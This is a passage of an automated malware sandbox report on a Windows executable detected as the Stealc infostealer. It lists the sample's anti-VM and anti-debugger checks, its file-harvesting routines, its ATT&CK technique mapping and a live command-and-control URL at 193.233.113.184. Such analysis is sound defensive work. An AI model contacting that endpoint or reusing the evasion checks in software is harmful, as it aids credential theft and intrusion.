                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26213
                    Source: C:\Users\user\Desktop\file.exeAPI coverage: 7.1 %
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0410E077
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0410C0D7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0410DCE7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0410F917
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04114107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_04114107
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04101937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04101937
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0410E697
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04113B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_04113B17
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04114B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04114B77
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0410EF87
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_041147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_041147D7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.3.drBinary or memory string: VMware
                    Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                    Source: file.exe, 00000000.00000002.1892318943.000000000250E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware=
                    Source: file.exe, 00000000.00000002.1892394350.000000000259A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                    Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                    Source: file.exe, 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: file.exe, 00000000.00000002.1892394350.000000000259A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: file.exe, 00000000.00000002.1892318943.000000000250E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26201
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26198
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26220
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26040
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27696
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26241
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26212
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26086
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0251FE20 push dword ptr fs:[00000030h]0_2_0251FE20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410092B mov eax, dword ptr fs:[00000030h]0_2_0410092B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04100D90 mov eax, dword ptr fs:[00000030h]0_2_04100D90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_041199B7 mov eax, dword ptr fs:[00000030h]0_2_041199B7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0411D151 SetUnhandledExceptionFilter,0_2_0411D151
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0411B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0411B5A1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0411AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0411AFAF
                    Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6036, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04119867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_04119867
                    Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_04117DF7
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.file.exe.4150000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4100e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4100e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.4150000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1710064685.0000000004150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6036, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.file.exe.4150000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4100e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4100e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.4150000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1710064685.0000000004150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6036, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe39%ReversingLabsWin32.Trojan.CrypterX
                    file.exe100%AviraHEUR/AGEN.1310247
                    file.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    http://193.233.113.184/6d687e53250c2111.php_e100%Avira URL Cloudmalware
                    http://193.233.113.184~0%Avira URL Cloudsafe
                    http://193.233.113.184/6d687e53250c2111.phpwe100%Avira URL Cloudmalware
                    http://193.233.113.184/100%Avira URL Cloudmalware
                    http://193.233.113.184/6d687e53250c2111.php100%Avira URL Cloudmalware
                    http://193.233.113.184100%Avira URL Cloudmalware
                    http://193.233.113.184/ws100%Avira URL Cloudmalware
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://193.233.113.184/true
                    • Avira URL Cloud: malware
                    unknown
                    http://193.233.113.184/6d687e53250c2111.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://193.233.113.184~file.exe, 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://upx.sf.netAmcache.hve.3.drfalse
                    • URL Reputation: safe
                    unknown
                    http://193.233.113.184/6d687e53250c2111.php_efile.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://193.233.113.184file.exe, 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1892318943.000000000250E000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://193.233.113.184/6d687e53250c2111.phpwefile.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://193.233.113.184/wsfile.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    193.233.113.184
                    unknownRussian Federation
                    20549FREE-MPEIRUtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1518566
                    Start date and time:2024-09-25 20:41:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@2/5@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 24
                    • Number of non-executed functions: 164
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.182.143.212
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    TimeTypeDescription
                    14:42:22API Interceptor1x Sleep call for process: WerFault.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    193.233.113.184file.exeGet hashmaliciousStealcBrowse
                    • 193.233.113.184/6d687e53250c2111.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 193.233.113.184/6d687e53250c2111.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 193.233.113.184/6d687e53250c2111.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    FREE-MPEIRUfile.exeGet hashmaliciousStealcBrowse
                    • 193.233.113.184
                    file.exeGet hashmaliciousStealcBrowse
                    • 193.233.113.184
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 193.233.113.184
                    SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                    • 193.233.121.52
                    file.exeGet hashmaliciousDCRatBrowse
                    • 193.233.115.185
                    BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                    • 193.233.122.71
                    https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousUnknownBrowse
                    • 193.233.84.115
                    https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousPhisherBrowse
                    • 193.233.84.115
                    https://vpnassdsd1.blob.core.windows.net/vpnassdsd1/unsD.html#9-FFJWW/11-9623-VPOIK/746-001437-16337Get hashmaliciousUnknownBrowse
                    • 193.233.84.175
                    https://ramandan.blob.core.windows.net/ramandan/1.html#15/117-4966/926-74892-11463-Get hashmaliciousPhisherBrowse
                    • 193.233.84.175
                    No context
                    No context
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
